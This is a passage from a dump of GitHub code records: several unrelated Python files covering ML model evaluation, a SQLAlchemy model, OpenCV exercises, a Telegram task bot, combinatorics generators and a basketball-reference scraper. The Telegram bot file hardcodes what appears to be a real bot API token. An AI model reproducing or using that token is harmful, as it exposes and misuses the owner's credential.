data\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n\n clf_number = int(str(list(train_test_sets.keys())[i])[8])\n\n # extract the relevant model from optimal model dictionary\n clf = list(optimal_models.values())[clf_number]\n\n # fit the model\n clf.fit(X_train, y_train.values.ravel())\n\n # make predictions\n y_pred = clf.predict(X_test)\n y_score = clf.predict_proba(X_test)[:, 1]\n\n # output performance metrics\n fpr, tpr, thresholds = metrics.roc_curve(\n y_test,\n y_score,\n drop_intermediate=False,\n pos_label=1)\n acc = metrics.accuracy_score(y_test, y_pred) # accuracy\n auc = metrics.auc(fpr, tpr)\n precision, recall, thresholds = metrics.\\\n precision_recall_curve(y_test, y_score)\n f1 = metrics.f1_score(y_test, y_pred)\n class_report = classification_report(y_test, y_pred)\n\n # http://scikit-learn.org/stable/modules/classes.html\n # create a dict to hold metrics for the current sliding window\n perf_metrics = {'metrics_sw' +\n str(list(train_test_sets.keys())[i][8]): {\n 'acc': acc,\n 'auc': auc,\n 'precision': precision,\n 'recall': recall,\n 'f1': f1,\n 'cr': class_report,\n 'tpr': tpr,\n 'fpr': fpr}\n }\n y_test_temp = {'y_test_' +\n str(list(train_test_sets.keys())[i][8]): y_test}\n y_pred_temp = {'y_pred_' +\n str(list(train_test_sets.keys())[i][8]): y_pred}\n y_score_temp = {'y_score_' +\n str(list(train_test_sets.keys())[i][8]): y_score}\n\n all_metrics.update(perf_metrics)\n y_tests.update(y_test_temp)\n y_preds.update(y_pred_temp)\n y_scores.update(y_score_temp)\n\n return all_metrics, y_tests, y_preds, y_scores\n\n\ndef return_final_metrics_VC(train_test_sets, optimal_weights, rf_optimal,\n mlp_optimal, xgb_optimal):\n \"\"\"\n Modified version of return_final_metrics_VC() which returns\n the performance measure(s) of the optimal VC model (which itself is\n made up of the optimal rf, mlp and xgb models 
determined via model\n selection). Metrics are returned for each sliding window.\n Models are evaluated on the test sets.\n\n Parameters\n ----------\n train_test_sets (dict of matrices): dict containing the train\n and test matrices for each sliding window.\n optimal_weights (dict of dicts): the optimal weights for the voting\n classifier for each sliding window. From tune_weights_ms().\n rf_optimal (dict of objects): optimal RFs for each SW, from model\n selection\n mlp_optimal (dict of objects): optimal MLPs for each SW, from model\n selection\n xgb_optimal (dict of objects): optimal XGBs for each SW, from model\n selection\n\n Returns\n -------\n all_metrics (dict of dicts): A dictionary of dictionaries containing\n performance measures\n E.g. metrics_0 : acc, auc... , metrics_1 : auc, acc... ,\n metrics_2 : auc, acc...\n y_tests (dict of dicts): A dictionary of dictionaries containing test\n set values\n y_preds (dict of dicts): A dictionary of dictionaries containing preds\n y_scores (dict of dicts): A dictionary of dictionaries containing\n scores\n \"\"\"\n\n all_metrics = {}\n y_tests = {}\n y_preds = {}\n y_scores = {}\n\n for i in np.arange(0, len(train_test_sets), 4): # for each sliding window\n\n sliding_window = int(str(list(train_test_sets.keys())[i])[8])\n clf1 = list(rf_optimal.values())[sliding_window] # RFClassifier\n clf2 = list(mlp_optimal.values())[sliding_window] # KerasClassifier\n clf3 = list(xgb_optimal.values())[sliding_window] # XGBoostClassifier\n\n # define the relevant training and test sets, and model\n X_train = list(train_test_sets.values())[i]\n X_test = list(train_test_sets.values())[i+2]\n y_train = list(train_test_sets.values())[i+1]\n y_test = list(train_test_sets.values())[i+3]\n\n # normalise the data since MLP is a voter\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n\n # extract optimal weights for given sliding window\n vc_weights = list(optimal_weights.values())[sliding_window]\n\n eclf = VotingClassifier(estimators=[('rf', clf1),\n ('mlp', clf2),\n ('xgb', clf3)],\n voting='soft',\n weights=vc_weights,\n n_jobs=1)\n\n # fit the model\n eclf.fit(X_train, y_train.values.ravel())\n\n # make predictions\n y_pred = eclf.predict(X_test)\n y_score = eclf.predict_proba(X_test)[:, 1]\n\n # output performance metrics\n fpr, tpr, thresholds = metrics.roc_curve(\n y_test,\n y_score,\n drop_intermediate=False,\n pos_label=1)\n acc = metrics.accuracy_score(y_test, y_pred) # accuracy\n auc = metrics.auc(fpr, tpr)\n precision, recall, thresholds = metrics.precision_recall_curve(\n y_test, y_score)\n f1 = metrics.f1_score(y_test, y_pred)\n class_report = classification_report(y_test, y_pred)\n\n # http://scikit-learn.org/stable/modules/classes.html\n perf_metrics = {'metrics_sw' +\n str(list(train_test_sets.keys())[i][8]): {\n 'acc': acc,\n 'auc': auc,\n 'precision': precision,\n 'recall': recall,\n 'f1': f1,\n 'cr': class_report,\n 'tpr': tpr,\n 'fpr': fpr}\n }\n\n y_test_temp = {'y_test_' +\n str(list(train_test_sets.keys())[i][8]): y_test}\n y_pred_temp = {'y_pred_' +\n str(list(train_test_sets.keys())[i][8]): y_pred}\n y_score_temp = {'y_score_' +\n str(list(train_test_sets.keys())[i][8]): y_score}\n\n all_metrics.update(perf_metrics)\n y_tests.update(y_test_temp)\n y_preds.update(y_pred_temp)\n y_scores.update(y_score_temp)\n return all_metrics, y_tests, 
y_preds, y_scores\n","repo_name":"tjb474/asset-price-prediction","sub_path":"Final/code/iPython notebooks/functions_modelling.py","file_name":"functions_modelling.py","file_ext":"py","file_size_in_byte":46779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36776368662","text":"from Application.database.initialize_database import Base, session\nfrom Application.database.sqlalchemy_imports import Integer,Column, String\n\nclass HomeImages(Base):\n __tablename__ = \"home_images\"\n\n image_id = Column(Integer, primary_key=True)\n info_type = Column(String(100), nullable=False)\n image_name = Column(String(100), nullable=False)\n image_desc = Column(String(500), nullable=True)\n\n def serialize(self):\n return {\n \"id\": self.image_id,\n \"info_type\": self.info_type, \n \"image_name\": self.image_name,\n \"image_desc\": self.image_desc\n }\n\n @classmethod\n def home_images(cls):\n try:\n images = cls.query.all()\n return [image.serialize() for image in images]\n\n except:\n session.rollback()\n\n @classmethod\n def read_image(cls, id):\n try:\n image = cls.query.filter_by(image_id=id).first()\n return image.serialize()\n except:\n session.rollback()\n\n @classmethod\n def delete_image(cls, id):\n try:\n image = cls.query.filter_by(image_id=id).first()\n if image:\n session.query(cls).filter_by(image_id=id).delete()\n session.commit()\n return True\n else:\n return False\n except:\n session.rollback()\n","repo_name":"Byenkya/ClickEat-Code","sub_path":"Application/database/models/click_eat_models/home_page_settings.py","file_name":"home_page_settings.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42191287558","text":"import sys\nimport numpy as np\nfrom skimage import io\nimport skimage.feature as sf\nimport matplotlib.pyplot as plt\nfrom sympy import *\nimport cv2 as cv\nfrom scipy import ndimage\n\n# 1\npicture = \"picture.png\"\ncam = cv.VideoCapture(0)\nwhile True:\n ret_val, img = cam.read()\n if cv.waitKey(1) == 27:\n cv.imwrite(picture, img)\n break\n elif img is None:\n sys.exit('Couldn`t read the image')\n break\n cv.imshow('My Webcam', img)\n\ndel cam\n\n# 2\nface_cv = cv.imread(picture)\ncv.imshow('Image', face_cv)\ncv.waitKey(0)\n\n# 3-a\nfig, ax = plt.subplots()\nface = io.imread(picture)\nplt.imshow(face)\nplt.show()\npoints, = ax.plot(40, 200, 'r*')\nx, y = points.get_data()\nprint(x, y)\n\n# 3-b\nimage = face\nimage = image[x[0]:x[0]+10, y[0]:y[0]+10]\nplt.imshow(image)\nplt.show()\ncv.waitKey(0)\n\n# 3-c\nired = np.zeros(face.shape)\nired[:, :, 0] = face[:, :, 0]\n\nigreen = np.zeros(face.shape)\nigreen[:, :, 1] = face[:, :, 1]\n\niblue = np.zeros(face.shape)\niblue[:, :, 2] = face[:, :, 2]\n\ncv.imshow('Blue', ired/255)\ncv.imshow('Green', igreen/255)\ncv.imshow('Red', iblue/255)\ncv.waitKey(0)\n\n# 4\ngray = cv.cvtColor(face_cv, cv.COLOR_BGR2GRAY)\ncv.imshow('Gray Image', gray)\ncv.waitKey(0)\n\n# 5\nkernel = np.ones((3, 3), np.float32)/25\nprint(kernel)\nfiltered_image = cv.filter2D(gray, -1, kernel)\ncv.imshow('Original Image', gray)\ncv.imshow('Blurred Image', filtered_image)\ngaussisan = cv.GaussianBlur(gray, (3, 3), 0)\ncv.imshow('Gaussian Blur', gaussisan)\ncv.waitKey(0)\n\n#6\nedges = cv.Laplacian(filtered_image, -1, ksize=5, scale=1, delta=0, borderType=cv.BORDER_DEFAULT)\ncv.imshow('Edges', edges)\ncv.waitKey(0)\n\n# 7\n#Magnitude\nf = np.fft.fft2(edges)\nfshift = 
np.fft.fftshift(f)\nmagnitude_spectrum = 20*np.log(np.abs(fshift))\nplt.imshow(magnitude_spectrum, cmap = 'gray')\n#Phase\ndft = np.fft.fft2(edges)\ndft_shift = np.fft.fftshift(dft)\nphase_spectrum = np.angle(dft_shift)\ncv.imshow(\"Phase\", phase_spectrum)\nplt.show()\ncv.waitKey(0)\n\n# 8\nplt.hist(face.ravel(), 256, [0, 256])\nplt.show()\n\n# 9\nmask = np.zeros(face.shape[:2], np.uint8)\nmask[200:450, 150:450] = 255\nmasked_img = cv.bitwise_and(face_cv,face_cv,mask = mask)\ncv.imshow('Masked Image', masked_img)\ncv.waitKey(0)\n\n# 10\nrotated = ndimage.rotate(face_cv, 60)\ncv.imshow(\"Rotated 60 degrees\", rotated)\n\nh_flip = cv.flip(face_cv, 1)\ncv.imshow(\"Horizontal Flip\", h_flip)\n\nv_flip = cv.flip(face_cv, 0)\ncv.imshow(\"Vertical FLip\", v_flip)\n\ncv.waitKey(0)\ncv.destroyAllWindows()","repo_name":"zsamamah/computer-vision","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31325296177","text":"from datetime import date, timedelta\nimport telebot\nimport sqlite3\nfrom djangoApp import datemanager\n\nAPI_key = '5623471620:AAFIDDb2ZgnxckPENindWH14PVnHAr7pp1Y'\n\nbot = telebot.TeleBot(API_key)\nconn = sqlite3.connect('C:\\\\Users\\\\Дом\\\\PycharmProjects\\\\djangoProject\\\\db.sqlite3', check_same_thread=False)\ncursor = conn.cursor()\n\n\ndef db_table_val(user_name: str):\n sql = \"select last_name from auth_user where last_name=:user_name\"\n sel = conn.cursor().execute(sql, {\"user_name\": user_name}).fetchall()\n if len(sel) != 0:\n return 1\n else:\n return 0\n\n\ndef db_tasks(user_name: str, date_day1: date, date_day2: date):\n sql = \"SELECT time_task, task_name, date_task FROM djangoapp_tasks t join auth_user u on u.id=t.user_id_id where last_name=:user_name and date_task between :date_task1 and :date_task2 and date_end='' order by date_task, time_task\"\n tasks = conn.cursor().execute(sql,\n {\"user_name\": user_name, \"date_task1\": date_day1, \"date_task2\": date_day2}).fetchall()\n return tasks\n\n\n@bot.message_handler(commands=['start'])\ndef get_command(message):\n if db_table_val(message.from_user.username) == 1:\n bot.send_message(message.chat.id,\n message.from_user.first_name + ' , добро пожаловать! \\n Доступные команды: \\n /task_today - задачи на сегодня \\n /task_tomorrow - задачи на завтра \\n /task_week - задачи на неделю')\n sql = \"update auth_user set email=:id where last_name=:user_name\"\n conn.cursor().execute(sql, {\"user_name\": message.from_user.username, \"id\": message.chat.id})\n conn.commit()\n else:\n bot.send_message(message.chat.id,\n message.from_user.first_name + ', тебе необходимо зарегистрироваться на сайте')\n\n\n@bot.message_handler(commands=['task_today'])\ndef get_command(message):\n tasks = db_tasks(message.from_user.username, date.today(), date.today())\n task = ''\n if db_table_val(message.from_user.username) == 1 and len(tasks) != 0:\n for l in range(len(tasks)):\n task += str(l + 1) + '. 
' + tasks[l][0] + ': ' + tasks[l][1] + '\\n'\n bot.send_message(message.chat.id,\n message.from_user.first_name + ' , твои задания на сегодня: ' + '\\n' + str(task))\n elif db_table_val(message.from_user.username) == 1 and len(tasks) == 0:\n bot.send_message(message.chat.id, message.from_user.first_name + ' , на сегодня не установлено задач')\n else:\n bot.send_message(message.chat.id,\n message.from_user.first_name + ', тебе необходимо зарегистрироваться на сайте')\n\n\n@bot.message_handler(commands=['task_tomorrow'])\ndef get_command(message):\n dt = date.today() + timedelta(days=1)\n tasks = db_tasks(message.from_user.username, dt, dt)\n if db_table_val(message.from_user.username) == 1 and len(tasks) != 0:\n task = ''\n for l in range(len(tasks)):\n task += str(l + 1) + '. ' + tasks[l][0] + ': ' + tasks[l][1] + '\\n'\n bot.send_message(message.chat.id,\n message.from_user.first_name + ' , твои задания на завтра: ' + '\\n' + str(task))\n elif db_table_val(message.from_user.username) == 1 and len(tasks) == 0:\n bot.send_message(message.chat.id, message.from_user.first_name + ' , на завтра не установлено задач')\n else:\n bot.send_message(message.chat.id,\n message.from_user.first_name + ', тебе необходимо зарегистрироваться на сайте')\n\n\n@bot.message_handler(commands=['task_week'])\ndef get_command(message):\n date1 = datemanager.DateManager().day_monday\n date2 = datemanager.DateManager().day_sunday\n tasks = db_tasks(message.from_user.username, date1, date2)\n if db_table_val(message.from_user.username) == 1 and len(tasks) != 0:\n task = ''\n for l in range(len(tasks)):\n task += tasks[l][2] + '. ' + tasks[l][0] + ': ' + tasks[l][1] + '\\n'\n bot.send_message(message.chat.id,\n message.from_user.first_name + ' , твои задания на неделю: ' + '\\n' + str(task))\n elif db_table_val(message.from_user.username) == 1 and len(tasks) == 0:\n bot.send_message(message.chat.id, message.from_user.first_name + ' , на текущую неделю не установлено задач')\n else:\n bot.send_message(message.chat.id,\n message.from_user.first_name + ', тебе необходимо зарегистрироваться на сайте')\n\n\n@bot.message_handler(content_types=['text'])\ndef start(message):\n if message.text == '/add_task':\n bot.send_message(message.from_user.id, \"Введи название задачи\")\n bot.register_next_step_handler(message, get_task_name)\n else:\n bot.send_message(message.from_user.id, 'Напиши /start')\n\n\ndef get_task_name(message):\n if message.text == '/end':\n pass\n else:\n global task_name\n task_name = message.text\n bot.send_message(message.from_user.id, 'Введи описание задачи')\n bot.register_next_step_handler(message, get_comment)\n\n\ndef get_comment(message):\n global task_comment\n task_comment = message.text\n bot.send_message(message.from_user.id, 'Введи дату задачи в формате гггг-мм-дд')\n bot.register_next_step_handler(message, get_date)\n\n\ndef get_date(message):\n global date_task\n date_task = message.text\n bot.send_message(message.from_user.id, 'Введи время задачи в формате чч:мм')\n bot.register_next_step_handler(message, get_time)\n\n\ndef get_time(message):\n global time_task\n time_task = message.text\n bot.send_message(message.from_user.id, 'Проверь данные: ' + '\\n' + 'Название:' + '\\n' + task_name +\n '\\n' + 'Описание:' + '\\n' + task_comment +\n '\\n' + 'Дата:' + '\\n' + date_task +\n '\\n' + 'Время:' + '\\n' + time_task + '\\n' + '\\n' +\n 'Данные верны? 
(Ответь \"Да\" или \"Нет\")')\n bot.register_next_step_handler(message, get_correct)\n\n\ndef get_correct(message):\n global correct_task\n correct_task = message.text\n if message.text == 'Да':\n bot.send_message(message.from_user.id, 'Данные внесены успешно')\n date_add = date.today().strftime(\"%Y-%m-%d\")\n sql_id = \"select id from auth_user where last_name=:user_name\"\n user_id_id = conn.cursor().execute(sql_id, {\"user_name\": message.from_user.username}).fetchall()[0][0]\n conn.cursor().execute(\n \"INSERT INTO djangoapp_tasks (task_name, task_comment, date_add, date_task, time_task, user_id_id, date_end) VALUES (?,?,?,?,?,?,?)\",\n (task_name, task_comment, date_add, date_task, time_task, int(user_id_id), ''))\n conn.commit()\n elif message.text == 'Нет':\n bot.send_message(message.from_user.id, \"Введи название задачи. \\nДля выхода нажми /end \")\n bot.register_next_step_handler(message, get_task_name)\n\n\nbot.polling(none_stop=True)\n","repo_name":"FedotovaVera/djangoProject","sub_path":"djangoApp/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7489,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11069001684","text":"from src.bvtlib.mongodb import get_track, get_autotest\n\ndef set_build_information(build, changes):\n \"\"\"make changes to records about build\"\"\"\n track = get_track()\n autotest = get_autotest()\n change = False\n builddoc = autotest.builds.find_one({'id':build})\n if builddoc:\n for field in changes:\n if changes[field] != builddoc.get(field):\n change = True\n if change:\n autotest.builds.update({'id':build}, {'$set':changes})\n track.updates.save({'build': build, 'action' : 'new build information'})\n","repo_name":"OpenXT/bvt","sub_path":"src/bvtlib/set_build_information.py","file_name":"set_build_information.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25454190834","text":"\"Functions that returns permutations of size n\"\n\n\ndef permutations(n):\n def perm_generator(n, prefix=[]):\n if len(prefix) == n:\n yield tuple(prefix)\n else:\n for i in range(1, n + 1):\n if i not in prefix:\n yield from perm_generator(n, prefix + [i])\n return list(perm_generator(n))\n\n\n\"Function that returns a sequence of n pairs of brackets \"\n\n\ndef correctbracketsequences(n):\n def brackets_generator(n, prefix='', balance=0):\n if balance == 0 and len(prefix) == 2 * n:\n yield prefix\n else:\n for i in ('(', ')'):\n new_p = prefix + i\n if i == '(':\n new_b = balance + 1\n else:\n new_b = balance - 1\n if len(new_p) <= 2 * n and new_b >= 0:\n yield from brackets_generator(n, new_p, new_b)\n return list(brackets_generator(n))\n\n\n\"Function that returns all combinations of numbers from n of size k\"\n\n\ndef combinationswithrepeats(n, k):\n def comb_generator(n, k, prefix=[]):\n if len(prefix) == k:\n yield tuple(prefix)\n else:\n if len(prefix) == 0:\n start = 1\n else:\n start = max(prefix)\n for i in range(start, n + 1):\n yield from (comb_generator(n, k, prefix + [i]))\n return list(comb_generator(n, k))\n\n\n\"\"\"Function that returns a list of all unsorted partitions of number n as a\nsorted tuple of numbers\"\"\"\n\n\ndef unorderedpartitions(n):\n def part_generator(n, prefix=[]):\n if sum(prefix) == n:\n yield tuple(prefix)\n else:\n if len(prefix) == 0:\n for i in range(1, n+1):\n new = prefix + [i]\n yield from part_generator(n, new)\n else:\n start = prefix[-1]\n for i 
in range(start, n - start + 2):\n new = prefix + [i]\n if sum(new) <= n:\n yield from part_generator(n, prefix + [i])\n return list(part_generator(n))\n\n\nif __name__ == '__main__':\n assert permutations(1) == [(1,)]\n assert permutations(2) == [(1, 2), (2, 1)]\n assert permutations(3) == [(1, 2, 3), (1, 3, 2), (2, 1, 3), (2, 3, 1),\n (3, 1, 2), (3, 2, 1)]\n print(\"permutations function - OK\")\n\n assert combinationswithrepeats(1, 1) == [(1,)]\n assert combinationswithrepeats(2, 2) == [(1, 1), (1, 2), (2, 2)]\n assert combinationswithrepeats(3, 2) == [(1, 1), (1, 2), (1, 3), (2, 2),\n (2, 3), (3, 3)]\n print(\"combinationswithrepeats function - OK\")\n\n assert unorderedpartitions(1) == [(1,)]\n assert unorderedpartitions(3) == [(1, 1, 1), (1, 2), (3,)]\n assert unorderedpartitions(5) == [(1, 1, 1, 1, 1), (1, 1, 1, 2), (1, 1, 3),\n (1, 2, 2), (1, 4), (2, 3), (5,)]\n print(\"unorderedpartitions function - OK\")\n\n assert correctbracketsequences(1) == ['()']\n assert correctbracketsequences(2) == ['(())', '()()']\n assert correctbracketsequences(3) == ['((()))', '(()())', '(())()',\n '()(())', '()()()']\n print(\"correctbracketsequences function - OK\")\n","repo_name":"dnemirich/python_course","sub_path":"Task5.py","file_name":"Task5.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23079816606","text":"#!/usr/local/bin/python3\n# -*- coding:utf-8 -*-\n\nfrom city.config import base_path,OpCity_config,config\nfrom collections import defaultdict\nimport json\nimport traceback\nimport sys\nimport pymysql\npymysql.install_as_MySQLdb()\nimport csv\nimport pymongo\nfrom city.config import config\nfrom city.insert_daodao_city import daodao_city\nfrom city.insert_hotel_city import hotel_city\nfrom city.insert_qyer_city import qyer_city\nfrom my_logger import get_logger\nfrom call_city_project.step_status import modify_status\n\nparam = sys.argv[1]\npath = ''.join([base_path, str(param), '/'])\nlogger = get_logger('step5', path)\n\ndef update_step_report(csv_path,param,step_front,step_after):\n conn = pymysql.connect(**OpCity_config)\n cursor = conn.cursor()\n update_sql_front = \"update city_order set report5=%s,step5=%s where id=%s\"\n update_sql_after = \"update city_order set step6=%s where id=%s\"\n update_sql_later = \"update city_order set step7=%s where id=%s\"\n try:\n cursor.execute(update_sql_front,(csv_path,step_front,param))\n cursor.execute(update_sql_after,(step_after,param))\n cursor.execute(update_sql_later,(step_after,param))\n conn.commit()\n except Exception as e:\n conn.rollback()\n finally:\n conn.close()\n#\n# def monitor_daodao(collection):\n# result = collection.find({'finished': 0})\n# not_finish_num = result.count()\n# total_num = collection.find({})\n# return not_finish_num / total_num\n# def monitor_qyer(collection):\n# result = collection.find({'finished': 0})\n# not_finish_num = result.count()\n# total_num = collection.find({})\n# return not_finish_num / total_num\n# def monitor_hotel(collections):\n# save_result = []\n# for collection in collections:\n# result = collection.find({'finished': 0})\n# not_finish_num = result.count()\n# total_num = collection.find({})\n# save_result.append(not_finish_num / total_num)\n# return max(save_result)\n#\n# def monitor_daodao_qyer_hotel(daodao_collection_name,qyer_collection_name,hotel_collections_name,param):\n# client = pymongo.MongoClient(host='10.10.231.105')\n# daodao_collection = 
client['MongoTask'][daodao_collection_name]\n# qyer_collection = client['MongoTask'][qyer_collection_name]\n# hotel_collections = []\n# for collection in hotel_collections_name:\n# hotel_collections.append(client['MongoTask'][collection])\n#\n# conn = pymysql.connect(**OpCity_config)\n# cursor = conn.cursor()\n# select_sql = \"select step5 from city_order where id=%s\"\n# cursor.execute(select_sql)\n# status_id = cursor.fetchone()[0]\n# if int(status_id) == 2:\n#\n# daodao_not_finish = monitor_daodao(daodao_collection)\n# qyer_not_finish = monitor_qyer(qyer_collection)\n# hotel_not_finish = monitor_hotel(hotel_collections)\n#\n# if not daodao_not_finish and not qyer_not_finish and not hotel_not_finish:\n# job = backgroudscheduler.get_job('step5')\n# job.remove()\n# update_step_report('', param, 1, 0)\n\n\ndef task_start():\n logger.info('[step5][%s]======== start =======' % (param,))\n try:\n sources = ['agoda', 'ctrip', 'elong', 'hotels', 'expedia', 'booking']\n return_result = defaultdict(dict)\n return_result['data'] = {}\n return_result['error']['error_id'] = 0\n return_result['error']['error_str'] = ''\n save_cityId = []\n database_name = ''.join(['add_city_', param])\n temp_config = config\n temp_config['db'] = database_name\n path = ''.join([base_path, param, '/', 'city_id.csv'])\n with open(path, 'r+') as city:\n reader = csv.DictReader(city)\n for row in reader:\n save_cityId.append(row['city_id'])\n logger.info('[step5][%s, %s, %s] 启动发 daodao 任务' % (save_cityId, param, temp_config))\n daodao_collection_name,daodao_task_name = daodao_city(save_cityId,param, temp_config)\n logger.info('[step5] 发 daodao 任务完成 [%s, %s]' % (daodao_collection_name, daodao_task_name))\n logger.info('[step5][%s, %s, %s] 启动发 qyer 任务' % (save_cityId, param, temp_config))\n qyer_collection_name,qyer_task_name = qyer_city(save_cityId,param, temp_config)\n logger.info('[step5] 发 qyer 任务完成 [%s, %s]' % (qyer_collection_name, qyer_task_name))\n logger.info('[step5][%s, %s, %s] 启动发 hotel 任务' % (save_cityId, param, temp_config))\n hotel_collections_name = hotel_city(save_cityId, param, sources, temp_config)\n logger.info('[step5] 发 hotel 任务完成 [%s]' % (hotel_collections_name))\n\n save_collection_names = []\n for collection_name in hotel_collections_name:\n save_collection_names.append(collection_name)\n save_collection_names.append((daodao_collection_name, daodao_task_name))\n save_collection_names.append((qyer_collection_name, qyer_task_name))\n\n tasks = modify_status('step5', param, save_collection_names)\n\n logger.info('[step5] 发 hotel 任务完成 [%s]' % (tasks))\n\n return_result = json.dumps(return_result)\n logger.info('[step5][%s]======== successed ======= \\n%s' % (param, return_result))\n\n except Exception as e:\n return_result['error']['error_id'] = 1\n return_result['error']['error_str'] = traceback.format_exc()\n return_result = json.dumps(return_result)\n update_step_report('', param, -1, 0)\n logger.info('[step5] [result][{0}]'.format(return_result))\n\n\n\nif __name__ == \"__main__\":\n task_start()","repo_name":"20113261/p_m","sub_path":"call_city_project/city_step_five.py","file_name":"city_step_five.py","file_ext":"py","file_size_in_byte":5583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37374231817","text":"# %pip install bs4\n# %pip install html5lib\n\nfrom bs4 import *\nfrom bs4.element import PageElement\nimport time\nimport requests\nimport re\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm, trange\nimport 
json\nimport pickle\nfrom pathlib import Path\n\nHOME_PAGE = 'https://www.basketball-reference.com'\nSEASONS_PAGE = 'https://www.basketball-reference.com/leagues'\nTEAMS_PAGE = 'https://www.basketball-reference.com/teams'\nBOXSCORES_PAGE = 'https://www.basketball-reference.com/boxscores'\n\ndef fetch_html(url,source=None):\n if source:\n try:\n data = load(url)\n return re.sub(\"\",\"\\n\",data)\n except:\n print(f'Failed to fetch {url} from local. Please try to fetch online instead')\n return None\n else:\n try:\n if not url.startswith(\"https://\"):\n url = \"https://\"+url\n session = requests.Session()\n return re.sub(\"\",\"\\n\",session.get(url).text)\n except:\n print(f'Failed to fetch {url} from web. Please double check url.')\n return None\n\ndef make_soup(text):\n return BeautifulSoup(text,features='html.parser')\n\ndef save(a,filepath,mode='w',file_type=None):\n if not Path(filepath).exists():\n Path(filepath).parent.mkdir(parents=True,exist_ok=True)\n if file_type is None:\n with open(filepath,mode) as f:\n f.write(a)\n elif file_type.endswith('json'):\n with open(filepath,mode) as f:\n json.dump(a,f)\n elif file_type.endswith('pkl'):\n with open(filepath,mode) as f:\n pickle.dump(a,f) \n\ndef load(filepath,mode='r',file_type=None):\n if file_type is None:\n with open(filepath,mode) as f:\n data = f.read()\n elif file_type.endswith('json'):\n with open(filepath,mode) as f:\n data = json.load(f)\n elif file_type.endswith('pkl'):\n with open(filepath,mode) as f:\n data = pickle.load(f) \n return data\n\n\ndef fetch_seasons_hrefs(save_to=None,from_local=False):\n # fetch leagues page\n url = SEASONS_PAGE\n html_text = fetch_html(url,from_local)\n html_soup = make_soup(html_text)\n seasons_list = [a['href'] for th in html_soup.find_all('th', {'data-stat': 'season'}) for a in th.find_all('a')]\n if save_to:\n save_url = f\"{save_to}{url}\" if url.endswith('.html') else f\"{save_to}{url}.html\"\n save(html_text,save_url)\n return seasons_list\n\ndef fetch_season_boxscores_hrefs(season_href,save_to=None,from_local=False,sleep=0):\n # Load and save season schedule page\n # Check for filters. If so iterate through each filter to get the entire list. 
Else use the schedule on the current page\n url = f\"{HOME_PAGE}{season_href.strip('.html')}_games.html\"\n html_text = fetch_html(url,from_local)\n if html_text is None:\n return\n if save_to:\n save_url = f\"{save_to}{url}\" if url.endswith('.html') else f\"{save_to}{url}.html\"\n save(html_text,save_url)\n \n html_soup = make_soup(html_text)\n season_boxscores_hrefs = []\n filter_div = html_soup.find('div',{'class':'filter'}) \n schedule_table = html_soup.find('table', {'id': 'schedule'})\n \n if filter_div is None:\n season_boxscores_hrefs = [a['href'] for th in schedule_table.find_all('td',{'data-stat':'box_score_text'}) for a in th]\n \n # If so iterate through each filter to get the entire list\n else: \n month_hrefs = [a['href'] for a in filter_div.select('a')]\n for month_href in month_hrefs:\n url = f'{HOME_PAGE}{month_href}'\n html_text = fetch_html(url,from_local)\n if html_text is None:\n continue\n if save_to:\n save_url = f\"{save_to}{url}\" if url.endswith('.html') else f\"{save_to}{url}.html\"\n save(html_text,save_url)\n\n html_soup = make_soup(html_text)\n schedule_table = html_soup.find('table', {'id': 'schedule'})\n season_boxscores_hrefs += [a['href'] for th in schedule_table.find_all('td',{'data-stat':'box_score_text'}) for a in th]\n if sleep:\n time.sleep(sleep)\n return season_boxscores_hrefs\n\ndef fetch_match_boxscores(boxscore_href,save_to=None,from_local=None, sleep=0, content_only=True):\n url = f\"{HOME_PAGE}{boxscore_href}\"\n html_text = fetch_html(url,from_local)\n html_soup = make_soup(html_text)\n box_scores_hrefs = []\n filter_div = html_soup.find('div',{'class':'filter'})\n if filter_div is not None:\n filter_hrefs = [a['href'] for a in filter_div.select('a')]\n for filter_href in filter_hrefs:\n url = f'{HOME_PAGE}{filter_href}'\n html_text = fetch_html(url,from_local)\n if html_text is None:\n continue\n if content_only:\n html_text = str(make_soup(html_text).find('div',{'id':'content'}))\n if save_to:\n save_url = f\"{save_to}{url}\" if url.endswith('.html') else f\"{save_to}{url}.html\"\n save(html_text,save_url)\n if sleep:\n time.sleep(sleep)\n box_scores_hrefs.append(filter_href)\n\n else:\n url = f'{HOME_PAGE}{boxscore_href}'\n html_text = fetch_html(url,from_local)\n if html_text is None:\n pass\n else:\n if save_to:\n save_url = f\"{save_to}{url}\" if url.endswith('.html') else f\"{save_to}{url}.html\"\n save(html_text,save_url)\n box_scores_hrefs.append(boxscore_href)\n return box_scores_hrefs\n\n\n\nif __name__ == \"__main__\":\n LOCAL_HOST = '/Volumes/Seagate Portable Disk/University of Manitoba/Data Science/Datasets/basketball-analytics/'\n checkpoint_path = f'{LOCAL_HOST}/checkpoint.pkl'\n # fetch seasons\n if Path(checkpoint_path).exists():\n i_chkpt,j_chkpt = load(checkpoint_path,mode='rb',file_type='.pkl')\n print(f'Resume from checkpoint = {i_chkpt,j_chkpt}')\n else:\n i_chkpt,j_chkpt = 0,0\n\n seasons_hrefs = fetch_seasons_hrefs(save_to=LOCAL_HOST,from_local=False)\n seasons_hrefs = tqdm(seasons_hrefs,position=0)\n for i,seasons_href in enumerate(seasons_hrefs):\n if i < i_chkpt: \n continue\n # fetch season boxscores list\n seasons_hrefs.set_description(seasons_href)\n season_boxscores_hrefs = fetch_season_boxscores_hrefs(seasons_href,save_to=LOCAL_HOST,from_local=False, 